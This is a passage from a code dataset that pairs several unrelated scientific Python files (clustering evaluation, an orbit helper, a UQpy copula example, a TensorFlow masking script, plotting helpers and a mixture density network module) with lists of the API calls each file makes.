cy_plt\n'), ((3168, 3263), 'sco2_cycle_ssc.get_one_des_dict_from_par_des_dict', 'sco2_solve.get_one_des_dict_from_par_des_dict', (['sol_dict_parametric', '"""T_htf_hot_des"""', 'i_plot'], {}), "(sol_dict_parametric,\n 'T_htf_hot_des', i_plot)\n", (3213, 3263), True, 'import sco2_cycle_ssc as sco2_solve\n'), ((3277, 3314), 'sco2_plots.C_sco2_TS_PH_plot', 'cy_plt.C_sco2_TS_PH_plot', (['dict_i_plot'], {}), '(dict_i_plot)\n', (3301, 3314), True, 'import sco2_plots as cy_plt\n'), ((275, 300), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (290, 300), False, 'import os\n'), ((2223, 2246), 'numpy.arange', 'np.arange', (['(570)', '(721)', '(25)'], {}), '(570, 721, 25)\n', (2232, 2246), True, 'import numpy as np\n')]
|
### evaluation
import numpy as np
from sklearn.linear_model import LinearRegression
class Evaluate(object):
def __init__(self, model_names, X_train, y_preds, config,verbose=0):
self.distance_min = config['distance_min']
self.point_min = config['point_min'] #0.05, point_min = 50
self.model_names = model_names
self.X_train= X_train
self.y_preds = y_preds
self.verbose = verbose
self.metrics = {'ratios':{}, 'slopes': {}, 'inters':{}, 'slopes_raw':{}}
self.boundary_points = {}
def fit(self):
for model_name in self.model_names:
ratios = get_ratio_range(self.X_train, self.y_preds[model_name])
slopes, inters, slopes_raw, boundaries = get_boundary_and_slope(self.X_train, self.y_preds[model_name], self.distance_min, self.point_min)
self.metrics['ratios'][model_name] =ratios
self.metrics['slopes'][model_name] = slopes
self.metrics['slopes_raw'][model_name] = slopes_raw
self.metrics['inters'][model_name] = inters
self.boundary_points[model_name] = boundaries
if self.verbose:
print('model_name {}, metrics ratios {}, slopes {}, inters{}'.format(model_name,
self.metrics['ratios'][model_name], self.metrics['slopes'][model_name],
self.metrics['inters'][model_name]))
return self
def get_ratio_range(X_train, y_pred):
"""
Compute range ratio index
"""
range_ratios=[]
n_components = max(y_pred)+1
for i in range(n_components):
X_train_i = X_train[y_pred==i]
T2_v = 10**(X_train_i[:,0])
T1_v = 10**(X_train_i[:,1])
range_ratio = (np.max(T1_v/T2_v)/np.min(T1_v/T2_v))
range_ratios.append(range_ratio)
return range_ratios
def get_boundary_from_two_clusters_(cluster_a, cluster_b, distance_min = 0.05):
# cluster_a: shape(n,2)
# cluster_b: shape(n,2)
id_a =set()
id_b =set()# the pair of row id (i,j), i is for cluster_a and j is for cluster_b
for i in range(cluster_a.shape[0]):
#i = 0
clsuter_a_i = cluster_a[i,:]
distance_list = np.sqrt( (clsuter_a_i[0]-cluster_b[:,0])**2 + (clsuter_a_i[1]-cluster_b[:,1])**2)
distance_ = np.amin(distance_list) # mini distance
if distance_ < distance_min:
j = np.argmin(distance_list)
id_a.add(i)
id_b.add(j)
if len(id_a) == 0 and len(id_a) == 0:
return []
else:
id_a = list(id_a)
id_b = list(id_b)
id_a.sort()
id_b.sort()
boundary_points = np.vstack( (cluster_a[id_a,:],cluster_b[id_b,:] ) )
return boundary_points
def get_boundary_and_slope(X_train, y_pred, distance_min=0.05, point_min = 50):
# point_min minimum point for the boundary points
# get the decision boundary and their slopes
boundary_list = [] # contains all boundary points
slope_raw_list = []
angle_diff_list = [] # contains the slope for that boundary
inter_list = []
n_components = max(y_pred)+1
data_all = [X_train[y_pred==i] for i in range(n_components)] # get each cluster points
for i in range(n_components-1):
for j in range(i+1, n_components):
cluster_a = data_all[i]
cluster_b = data_all[j]
boundary_points = get_boundary_from_two_clusters_(cluster_a, cluster_b,distance_min = distance_min)
if len(boundary_points) > point_min:
boundary_list.append(boundary_points)
# linear regression
lr_ = LinearRegression()
X_ = boundary_points[:,0].reshape(-1,1)
y_ = boundary_points[:,1]
lr_.fit(X_,y_)
slope = lr_.coef_[0]/np.pi*180
inter = lr_.intercept_
slope_raw_list.append(slope)
inter_list.append(inter)
diff_slope = abs(slope-45)
angle_diff_list.append(diff_slope) # normalize slope
return angle_diff_list, inter_list, slope_raw_list, boundary_list
|
[
"numpy.sqrt",
"numpy.amin",
"numpy.max",
"numpy.vstack",
"numpy.min",
"numpy.argmin",
"sklearn.linear_model.LinearRegression"
] |
[((2206, 2300), 'numpy.sqrt', 'np.sqrt', (['((clsuter_a_i[0] - cluster_b[:, 0]) ** 2 + (clsuter_a_i[1] - cluster_b[:, 1\n ]) ** 2)'], {}), '((clsuter_a_i[0] - cluster_b[:, 0]) ** 2 + (clsuter_a_i[1] -\n cluster_b[:, 1]) ** 2)\n', (2213, 2300), True, 'import numpy as np\n'), ((2308, 2330), 'numpy.amin', 'np.amin', (['distance_list'], {}), '(distance_list)\n', (2315, 2330), True, 'import numpy as np\n'), ((2661, 2712), 'numpy.vstack', 'np.vstack', (['(cluster_a[id_a, :], cluster_b[id_b, :])'], {}), '((cluster_a[id_a, :], cluster_b[id_b, :]))\n', (2670, 2712), True, 'import numpy as np\n'), ((1750, 1769), 'numpy.max', 'np.max', (['(T1_v / T2_v)'], {}), '(T1_v / T2_v)\n', (1756, 1769), True, 'import numpy as np\n'), ((1768, 1787), 'numpy.min', 'np.min', (['(T1_v / T2_v)'], {}), '(T1_v / T2_v)\n', (1774, 1787), True, 'import numpy as np\n'), ((2400, 2424), 'numpy.argmin', 'np.argmin', (['distance_list'], {}), '(distance_list)\n', (2409, 2424), True, 'import numpy as np\n'), ((3637, 3655), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (3653, 3655), False, 'from sklearn.linear_model import LinearRegression\n')]
|
"""
orbit.py
"Frankly, a very limited and highly specific implementation of an Orbit class.
If used for applications other than the original usecase, this class will
either need to be bypassed or heavily expanded upon."
@author: <NAME> (https://github.com/Hans-Bananendans/)
"""
from numpy import log
class Orbit:
"""This class stores and supplies orbital parameters for given circular
SSO orbit"""
def __init__(self,h,i,LTAN):
self.h = h #[km]
self.i = i #[deg]
self.LTAN = LTAN #0-23[h] e.g. 14 is 14:00
def period(self):
"""
Parameters
----------
h : double
Orbital altitude in [km].
Returns
-------
int
Orbital period in [s].
"""
return int(2*3.141593 * ((1000*(6371+self.h))**3/(3.986*10**14))**0.5)
def eclipse(self):
"""
eclipse(h)
Note: Only valid between LTAN [10:00, 11:00], based on logarithmic
regression of simulated eclipse data in GMAT. For more info,
consult eclipse_predictions.xlsx.
ACCURATE TO WITHIN A FEW SECONDS
Parameters
----------
h : double
Orbital altitude in [km].
Returns
-------
double
Total eclipse duration (including penumbras) in [s].
"""
# If LTAN is 10:00
# e = -151*log(self.h) + 2965 # [s]
# If LTAN is 10:30
e = -125*log(self.h) + 2860 # [s]
# If LTAN is 11:00
# e = -109*log(self.h) + 2800 # [s]
return e
def eclipse_frac(self):
"""
eclipse(h)
Note: Only valid for LTAN 10:00, 10:30, 11:00, based on logarithmic
regression of simulated eclipse data in GMAT. For more info,
consult eclipse_predictions.xlsx.
ACCURACY TO WITHIN 0.1 OF TRUE VALUE
Parameters
----------
h : double
Orbital altitude in [km].
Returns
-------
double
Percentage of orbit that is in ECLIPSE [%].
"""
return self.eclipse()/self.period()
|
[
"numpy.log"
] |
[((1541, 1552), 'numpy.log', 'log', (['self.h'], {}), '(self.h)\n', (1544, 1552), False, 'from numpy import log\n')]
|
"""
Multivariate from independent marginals and copula
==================================================
"""
#%% md
#
# - How to define α bivariate distribution from independent marginals and change its structure based on a copula supported by UQpy
# - How to plot the pdf of the distribution
# - How to modify the parameters of the distribution
#%%
#%% md
#
# Import the necessary modules.
#%%
import numpy as np
import matplotlib.pyplot as plt
#%% md
#
# Example of a multivariate distribution from joint independent marginals
# ------------------------------------------------------------------------
#%%
from UQpy.distributions import Normal, JointIndependent
from UQpy.distributions import Gumbel, JointCopula
#%% md
#
# Define a Copula
# ---------------
# The definition of bivariate distribution with a copula, is similar to defining a multivariate distribution from
# independent marginals. In both cases a list of marginals needs to be defined. In case of
#%%
marginals = [Normal(loc=0., scale=1), Normal(loc=0., scale=1)]
copula = Gumbel(theta=3.)
# dist_1 is a multivariate normal with independent marginals
dist_1 = JointIndependent(marginals)
print('Does the distribution with independent marginals have an rvs method?')
print(hasattr(dist_1, 'rvs'))
# dist_2 exhibits dependence between the two dimensions, defined using a gumbel copula
dist_2 = JointCopula(marginals=marginals, copula=copula)
print('Does the distribution with copula have an rvs method?')
print(hasattr(dist_2, 'rvs'))
#%% md
#
# Plot the pdf of the distribution before and after the copula
# -------------------------------------------------------------
#
#%%
fig, ax = plt.subplots(ncols=2, figsize=(10, 4))
x = np.arange(-3, 3, 0.1)
y = np.arange(-3, 3, 0.1)
X, Y = np.meshgrid(x, y)
Z = dist_1.pdf(x=np.concatenate([X.reshape((-1, 1)), Y.reshape((-1, 1))], axis=1))
CS = ax[0].contour(X, Y, Z.reshape(X.shape))
ax[0].clabel(CS, inline=1, fontsize=10)
ax[0].set_title('Contour plot of pdf - independent normals')
x = np.arange(-3, 3, 0.1)
y = np.arange(-3, 3, 0.1)
X, Y = np.meshgrid(x, y)
Z = dist_2.pdf(x=np.concatenate([X.reshape((-1, 1)), Y.reshape((-1, 1))], axis=1))
CS = ax[1].contour(X, Y, Z.reshape(X.shape))
ax[1].clabel(CS, inline=1, fontsize=10)
ax[1].set_title('Contour plot of pdf - normals with Gumbel copula')
plt.show()
#%% md
#
# Modify the parameters of the multivariate copula.
# -------------------------------------------------
#
# Use the update_parameters method.
#%%
print(dist_2.copula.parameters)
dist_2.update_parameters(theta_c=2.)
print(dist_2.copula.parameters)
|
[
"UQpy.distributions.JointCopula",
"UQpy.distributions.JointIndependent",
"UQpy.distributions.Normal",
"UQpy.distributions.Gumbel",
"numpy.meshgrid",
"matplotlib.pyplot.subplots",
"numpy.arange",
"matplotlib.pyplot.show"
] |
[((1055, 1072), 'UQpy.distributions.Gumbel', 'Gumbel', ([], {'theta': '(3.0)'}), '(theta=3.0)\n', (1061, 1072), False, 'from UQpy.distributions import Gumbel, JointCopula\n'), ((1143, 1170), 'UQpy.distributions.JointIndependent', 'JointIndependent', (['marginals'], {}), '(marginals)\n', (1159, 1170), False, 'from UQpy.distributions import Normal, JointIndependent\n'), ((1376, 1423), 'UQpy.distributions.JointCopula', 'JointCopula', ([], {'marginals': 'marginals', 'copula': 'copula'}), '(marginals=marginals, copula=copula)\n', (1387, 1423), False, 'from UQpy.distributions import Gumbel, JointCopula\n'), ((1672, 1710), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': '(2)', 'figsize': '(10, 4)'}), '(ncols=2, figsize=(10, 4))\n', (1684, 1710), True, 'import matplotlib.pyplot as plt\n'), ((1716, 1737), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (1725, 1737), True, 'import numpy as np\n'), ((1742, 1763), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (1751, 1763), True, 'import numpy as np\n'), ((1771, 1788), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (1782, 1788), True, 'import numpy as np\n'), ((2023, 2044), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (2032, 2044), True, 'import numpy as np\n'), ((2049, 2070), 'numpy.arange', 'np.arange', (['(-3)', '(3)', '(0.1)'], {}), '(-3, 3, 0.1)\n', (2058, 2070), True, 'import numpy as np\n'), ((2078, 2095), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (2089, 2095), True, 'import numpy as np\n'), ((2332, 2342), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2340, 2342), True, 'import matplotlib.pyplot as plt\n'), ((996, 1020), 'UQpy.distributions.Normal', 'Normal', ([], {'loc': '(0.0)', 'scale': '(1)'}), '(loc=0.0, scale=1)\n', (1002, 1020), False, 'from UQpy.distributions import Normal, JointIndependent\n'), ((1021, 1045), 'UQpy.distributions.Normal', 'Normal', ([], {'loc': '(0.0)', 'scale': '(1)'}), '(loc=0.0, scale=1)\n', (1027, 1045), False, 'from UQpy.distributions import Normal, JointIndependent\n')]
|
from __future__ import absolute_import, division, print_function
import numpy as np
import tensorflow as tf
from IPython.core.debugger import Tracer; debug_here = Tracer();
batch_size = 5
max_it = tf.constant(6)
char_mat_1 = [[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0]]
char_mat_2 = [[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_3 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_4 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
char_mat_5 = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
#expected output: [5, 2, 4, 5, 4]
char_lst = [char_mat_1, char_mat_2, char_mat_3,
char_mat_4, char_mat_5]
np_char_tensor = np.array(char_lst)
char_prob = tf.constant(np.array(np_char_tensor), tf.float64)
char_prob = tf.transpose(char_prob, [1, 0, 2])
print(tf.Tensor.get_shape(char_prob))
sequence_length_lst = [1, 1, 1, 1, 1]
sequence_length = tf.constant(sequence_length_lst)
done_mask = tf.cast(tf.zeros(batch_size), tf.bool)
for time in range(0, 5):
print(time)
current_date = char_prob[:, time, :]
max_vals = tf.argmax(current_date, 1)
mask = tf.equal(max_vals, tf.constant(0, tf.int64))
current_mask = tf.logical_and(mask, tf.logical_not(done_mask))
done_mask = tf.logical_or(mask, done_mask)
time_vec = tf.ones(batch_size, tf.int32)*(time+2)
sequence_length = tf.select(done_mask, sequence_length, time_vec, name=None)
not_done_no = tf.reduce_sum(tf.cast(tf.logical_not(done_mask), tf.int32))
all_eos = tf.equal(not_done_no, tf.constant(0))
stop_loop = tf.logical_or(all_eos, tf.greater(time, max_it))
keep_working = tf.logical_not(stop_loop)
sess = tf.Session()
with sess.as_default():
tf.initialize_all_variables().run()
#print(char_prob.eval())
print(max_vals.eval())
print(mask.eval())
print(done_mask.eval())
print(sequence_length.eval())
print(keep_working.eval())
|
[
"tensorflow.Tensor.get_shape",
"IPython.core.debugger.Tracer",
"tensorflow.initialize_all_variables",
"tensorflow.transpose",
"tensorflow.logical_or",
"tensorflow.ones",
"tensorflow.logical_not",
"tensorflow.Session",
"numpy.array",
"tensorflow.argmax",
"tensorflow.constant",
"tensorflow.greater",
"tensorflow.select",
"tensorflow.zeros"
] |
[((164, 172), 'IPython.core.debugger.Tracer', 'Tracer', ([], {}), '()\n', (170, 172), False, 'from IPython.core.debugger import Tracer\n'), ((199, 213), 'tensorflow.constant', 'tf.constant', (['(6)'], {}), '(6)\n', (210, 213), True, 'import tensorflow as tf\n'), ((1507, 1525), 'numpy.array', 'np.array', (['char_lst'], {}), '(char_lst)\n', (1515, 1525), True, 'import numpy as np\n'), ((1601, 1635), 'tensorflow.transpose', 'tf.transpose', (['char_prob', '[1, 0, 2]'], {}), '(char_prob, [1, 0, 2])\n', (1613, 1635), True, 'import tensorflow as tf\n'), ((1730, 1762), 'tensorflow.constant', 'tf.constant', (['sequence_length_lst'], {}), '(sequence_length_lst)\n', (1741, 1762), True, 'import tensorflow as tf\n'), ((2495, 2507), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (2505, 2507), True, 'import tensorflow as tf\n'), ((1551, 1575), 'numpy.array', 'np.array', (['np_char_tensor'], {}), '(np_char_tensor)\n', (1559, 1575), True, 'import numpy as np\n'), ((1642, 1672), 'tensorflow.Tensor.get_shape', 'tf.Tensor.get_shape', (['char_prob'], {}), '(char_prob)\n', (1661, 1672), True, 'import tensorflow as tf\n'), ((1783, 1803), 'tensorflow.zeros', 'tf.zeros', (['batch_size'], {}), '(batch_size)\n', (1791, 1803), True, 'import tensorflow as tf\n'), ((1912, 1938), 'tensorflow.argmax', 'tf.argmax', (['current_date', '(1)'], {}), '(current_date, 1)\n', (1921, 1938), True, 'import tensorflow as tf\n'), ((2079, 2109), 'tensorflow.logical_or', 'tf.logical_or', (['mask', 'done_mask'], {}), '(mask, done_mask)\n', (2092, 2109), True, 'import tensorflow as tf\n'), ((2187, 2245), 'tensorflow.select', 'tf.select', (['done_mask', 'sequence_length', 'time_vec'], {'name': 'None'}), '(done_mask, sequence_length, time_vec, name=None)\n', (2196, 2245), True, 'import tensorflow as tf\n'), ((2461, 2486), 'tensorflow.logical_not', 'tf.logical_not', (['stop_loop'], {}), '(stop_loop)\n', (2475, 2486), True, 'import tensorflow as tf\n'), ((1969, 1993), 'tensorflow.constant', 'tf.constant', (['(0)', 'tf.int64'], {}), '(0, tf.int64)\n', (1980, 1993), True, 'import tensorflow as tf\n'), ((2036, 2061), 'tensorflow.logical_not', 'tf.logical_not', (['done_mask'], {}), '(done_mask)\n', (2050, 2061), True, 'import tensorflow as tf\n'), ((2126, 2155), 'tensorflow.ones', 'tf.ones', (['batch_size', 'tf.int32'], {}), '(batch_size, tf.int32)\n', (2133, 2155), True, 'import tensorflow as tf\n'), ((2361, 2375), 'tensorflow.constant', 'tf.constant', (['(0)'], {}), '(0)\n', (2372, 2375), True, 'import tensorflow as tf\n'), ((2416, 2440), 'tensorflow.greater', 'tf.greater', (['time', 'max_it'], {}), '(time, max_it)\n', (2426, 2440), True, 'import tensorflow as tf\n'), ((2287, 2312), 'tensorflow.logical_not', 'tf.logical_not', (['done_mask'], {}), '(done_mask)\n', (2301, 2312), True, 'import tensorflow as tf\n'), ((2536, 2565), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (2563, 2565), True, 'import tensorflow as tf\n')]
|
from typing import List, Tuple
import seaborn as sns
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
"""
Plots of tensorboard results with adjusted theming for presentation
"""
label_dict = {0: 'akiec', 1: 'bcc', 2: 'bkl', 3: 'df', 4: 'mel', 5: 'nv', 6: 'vasc'}
sns.set_context(rc={'patch.linewidth': 0.0})
bg_color = '#DAEDEF'
first_color = '#ADC9C4'
second_color = '#7D918E'
def set_plot_theme(ax):
ax.set_facecolor(bg_color)
ax.spines['left'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_color(second_color)
ax.xaxis.label.set_color(second_color)
ax.yaxis.label.set_color(second_color)
ax.yaxis.grid(color=second_color, linewidth=.5, zorder=0)
ax.tick_params(axis='x', colors=second_color)
ax.tick_params(axis='y', colors=second_color, width=.5)
def plot_label_counts(label_counts):
series = pd.Series(label_counts, index=[label_dict[i] for i in range(7)])
fig, ax = plt.subplots(nrows=1, ncols=1, facecolor=bg_color)
ax.set_title('', color=second_color)
sns.barplot(x=series.index, y=series, ax=ax, ci=None, color=first_color, zorder=3)
set_plot_theme(ax)
fig.show()
def plot_confusion_matrix(confusion_matrix, title):
pct_matrix = confusion_matrix / np.sum(confusion_matrix, axis=0)
df_cm = pd.DataFrame(pct_matrix,
index=[label_dict[i] for i in range(7)],
columns=[label_dict[i] for i in range(7)])
# draw heatmap
fig, ax = plt.subplots(nrows=1, ncols=1, facecolor=bg_color)
cmap = sns.dark_palette("#E3F8FA", as_cmap=True)
sns.heatmap(df_cm, ax=ax, annot=True, fmt=".2f", cmap=cmap)
ax.set_title(title, color=second_color)
ax.spines['left'].set_color(second_color)
ax.spines['left'].set_visible(True)
ax.spines['right'].set_color(second_color)
ax.spines['right'].set_visible(True)
ax.spines['top'].set_color(second_color)
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_color(second_color)
ax.spines['bottom'].set_visible(True)
ax.xaxis.label.set_color(second_color)
ax.yaxis.label.set_color(second_color)
ax.tick_params(axis='x', colors=second_color, width=1.0)
ax.tick_params(axis='y', colors=second_color, width=.5)
fig.show()
def plot_performance_graphs(data: List[Tuple[str, str, str, pd.Series]]):
fig, ax = plt.subplots(nrows=1, ncols=1, facecolor=bg_color)
ax.set_ylim([0.0, 1.0])
set_plot_theme(ax)
for title, color, linestyle, series in data:
ax.plot(series.index, series, label=title, color=color, linestyle=linestyle)
#plt.axvline(x=8, color=second_color)
ax.legend()
fig.show()
|
[
"matplotlib.use",
"seaborn.set_context",
"seaborn.heatmap",
"numpy.sum",
"seaborn.dark_palette",
"seaborn.barplot",
"matplotlib.pyplot.subplots"
] |
[((72, 95), 'matplotlib.use', 'matplotlib.use', (['"""TkAgg"""'], {}), "('TkAgg')\n", (86, 95), False, 'import matplotlib\n'), ((334, 378), 'seaborn.set_context', 'sns.set_context', ([], {'rc': "{'patch.linewidth': 0.0}"}), "(rc={'patch.linewidth': 0.0})\n", (349, 378), True, 'import seaborn as sns\n'), ((1067, 1117), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'facecolor': 'bg_color'}), '(nrows=1, ncols=1, facecolor=bg_color)\n', (1079, 1117), True, 'from matplotlib import pyplot as plt\n'), ((1163, 1249), 'seaborn.barplot', 'sns.barplot', ([], {'x': 'series.index', 'y': 'series', 'ax': 'ax', 'ci': 'None', 'color': 'first_color', 'zorder': '(3)'}), '(x=series.index, y=series, ax=ax, ci=None, color=first_color,\n zorder=3)\n', (1174, 1249), True, 'import seaborn as sns\n'), ((1611, 1661), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'facecolor': 'bg_color'}), '(nrows=1, ncols=1, facecolor=bg_color)\n', (1623, 1661), True, 'from matplotlib import pyplot as plt\n'), ((1673, 1714), 'seaborn.dark_palette', 'sns.dark_palette', (['"""#E3F8FA"""'], {'as_cmap': '(True)'}), "('#E3F8FA', as_cmap=True)\n", (1689, 1714), True, 'import seaborn as sns\n'), ((1719, 1778), 'seaborn.heatmap', 'sns.heatmap', (['df_cm'], {'ax': 'ax', 'annot': '(True)', 'fmt': '""".2f"""', 'cmap': 'cmap'}), "(df_cm, ax=ax, annot=True, fmt='.2f', cmap=cmap)\n", (1730, 1778), True, 'import seaborn as sns\n'), ((2483, 2533), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'facecolor': 'bg_color'}), '(nrows=1, ncols=1, facecolor=bg_color)\n', (2495, 2533), True, 'from matplotlib import pyplot as plt\n'), ((1374, 1406), 'numpy.sum', 'np.sum', (['confusion_matrix'], {'axis': '(0)'}), '(confusion_matrix, axis=0)\n', (1380, 1406), True, 'import numpy as np\n')]
|
"""
A module for a mixture density network layer
(_Mixture Desity Networks_ by Bishop, 1994.)
"""
import sys
import torch
import torch.tensor as ts
import torch.nn as nn
import torch.optim as optim
from torch.distributions import Categorical
import math
# Draw distributions
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.colors import LinearSegmentedColormap
'''
Process:
Input:x -> Some model (body) -> Characteristic vector:z (feature)
-> MDN (head) -> Probabilistic vector:p (output)
'''
class MDN_Module(nn.Module):
"""
A Mixture Density Network Module
Symbols:
B - Batch size
G - Number of Gaussian components
D - Input's dimensions
F - Feature's dimensions
C - Output's dimensions (Gaussian distribution's dimensions)
Arguments:
dim_fea (int): the feature's dimensions
dim_prob (int): the output's dimenssions
num_gaus (int): the number of Gaussians per output dimension
Input:
minibatch (BxF)
Output:
(alp, mu, sigma) (BxG, BxGxC, BxGxC)
alp - (alpha) Component's weight
mu - Mean value
sigma - Standard deviation
"""
def __init__(self, dim_fea, dim_prob, num_gaus):
super(MDN_Module, self).__init__()
self.dim_fea = dim_fea
self.dim_prob = dim_prob
self.num_gaus = num_gaus
self.layer_alp = nn.Sequential(
nn.Linear(dim_fea, num_gaus),
nn.Softmax(dim=1) # If 1, go along each row
)
self.layer_mu = nn.Linear(dim_fea, dim_prob*num_gaus)
self.layer_sigma = nn.Sequential(
nn.Linear(dim_fea, dim_prob*num_gaus),
ReExp_Layer()
)
def forward(self, batch):
alp = self.layer_alp(batch)
mu = self.layer_mu(batch)
mu = mu.view(-1, self.num_gaus, self.dim_prob)
sigma = self.layer_sigma(batch)
sigma = sigma.view(-1, self.num_gaus, self.dim_prob)
return alp, mu, sigma
class ReExp_Layer(nn.Module):
"""
A modified exponential layer.
Only the negative part of the exponential retains.
The positive part is linear: y=x+1.
"""
def __init__(self):
super().__init__()
def forward(self, x):
l = nn.ELU() # ELU: max(0,x)+min(0,α∗(exp(x)−1))
return torch.add(l(x), 1) # assure no negative sigma produces!!!
class classic_MDN_Module(nn.Module):
def __init__(self, dim_fea, dim_prob, num_gaus):
super(classic_MDN_Module, self).__init__()
self.dim_fea = dim_fea
self.dim_prob = dim_prob
self.num_gaus = num_gaus
self.layer_alp = nn.Sequential(
nn.Linear(dim_fea, num_gaus),
nn.Softmax(dim=1) # If 1, go along each row
)
self.layer_mu = nn.Linear(dim_fea, dim_prob*num_gaus)
self.layer_sigma = nn.Sequential(
nn.Linear(dim_fea, dim_prob*num_gaus)
)
def forward(self, batch):
alp = self.layer_alp(batch)
mu = self.layer_mu(batch)
mu = mu.view(-1, self.num_gaus, self.dim_prob)
sigma = torch.exp(self.layer_sigma(batch))
sigma = sigma.view(-1, self.num_gaus, self.dim_prob)
return alp, mu, sigma
def cal_GauProb(mu, sigma, x):
"""
Return the probability of "data" given MoG parameters "mu" and "sigma".
Arguments:
mu (BxGxC) - The means of the Gaussians.
sigma (BxGxC) - The standard deviation of the Gaussians.
x (BxC) - A batch of data points.
Return:
probabilities (BxG): The probability of each point in the probability
of the distribution in the corresponding mu/sigma index.
"""
x = x.unsqueeze(1).expand_as(mu) # BxC -> Bx1xC -> BxGxC
prob = torch.rsqrt(torch.tensor(2*math.pi)) * torch.exp(-((x - mu) / sigma)**2 / 2) / sigma
return torch.prod(prob, dim=2) # overall probability for all output's dimensions in each component, BxG
def cal_multiGauProb(alp, mu, sigma, x):
"""
Arguments:
alp (BxG) - (alpha) Component's weight
"""
prob = alp * cal_GauProb(mu, sigma, x) # BxG
prob = torch.sum(prob, dim=1) # Bx1
# overall prob for each batch (sum is for all compos)
return prob
def loss_NLL(alp, mu, sigma, data):
"""
Calculates the error, given the MoG parameters and the data.
The loss is the negative log likelihood of the data given the MoG parameters.
"""
nll = -torch.log(cal_multiGauProb(alp, mu, sigma, data))
return torch.mean(nll)
def loss_MaDist(alp, mu, sigma, data): # Mahalanobis distance
'''
mu (GxC) - The means of the Gaussians.
sigma (GxC) - The standard deviation of the Gaussians.
'''
md = []
alp = alp/sum(alp) #normalization
for i in range(mu.shape[0]): # do through every component
mu0 = (data-mu[i,:]).unsqueeze(0) # (x-mu)
S_inv = ts([[1/sigma[i,0],0],[0,1/sigma[i,1]]]) # S^-1 inversed covariance matrix
md0 = torch.sqrt( S_inv[0,0]*mu0[0,0]**2 + S_inv[1,1]*mu0[0,1]**2 )
md.append(md0)
return ts(md), sum(ts(md)*alp)
def loss_EMD(): pass
def sample(alp, mu, sigma):
"""
Draw samples from a MoG.
Return one sample for each batch
"""
categorical = Categorical(alp) # aka. generalized Bernoulli
try:
alps = list(categorical.sample().data) # take a sample of alpha for each batch
except:
raise Exception('Ooooops! Model collapse!')
sample = sigma.new_empty(sigma.size(0), sigma.size(2)).normal_() # sample of (0,1) normal distribution
for i, idx in enumerate(alps):
sample[i] = sample[i].mul(sigma[i,idx]).add(mu[i,idx])
return sample
def take_mainCompo(alp, mu, sigma, main=3):
alp = alp[0,:]
mu = mu[0,:,:]
sigma = sigma[0,:,:]
main_alp = alp[:main] # placeholder
main_mu = mu[:main,:] # placeholder
main_sigma = sigma[:main,:] # placeholder
_, indices = torch.sort(alp) # ascending order
for i in range(1,main+1):
idx = indices[-i].item() # largest to smallest
main_alp[i-1] = alp[idx]
main_mu[i-1,:] = mu[idx,:]
main_sigma[i-1,:] = sigma[idx,:]
return main_alp.unsqueeze(0), main_mu.unsqueeze(0), main_sigma.unsqueeze(0) # insert the "batch" dimension
def take_goodCompo(alp, mu, sigma, thre=0.1):
alp = alp[0,:]
mu = mu[0,:,:]
sigma = sigma[0,:,:]
thre = thre*max(alp)
idx = (alp>thre)
good_alp = alp[idx]
good_mu = mu[idx,:]
good_sigma = sigma[idx,:]
return good_alp.unsqueeze(0), good_mu.unsqueeze(0), good_sigma.unsqueeze(0) # insert the "batch" dimension
def sigma_limit(mu, sigma, nsigma=3):
# nsigma: 1 -> 0.6827 2 -> 0.9545 3 -> 0.9974
x_scope = [(mu-nsigma*sigma)[0,:,0], (mu+nsigma*sigma)[0,:,0]]
y_scope = [(mu-nsigma*sigma)[0,:,1], (mu+nsigma*sigma)[0,:,1]]
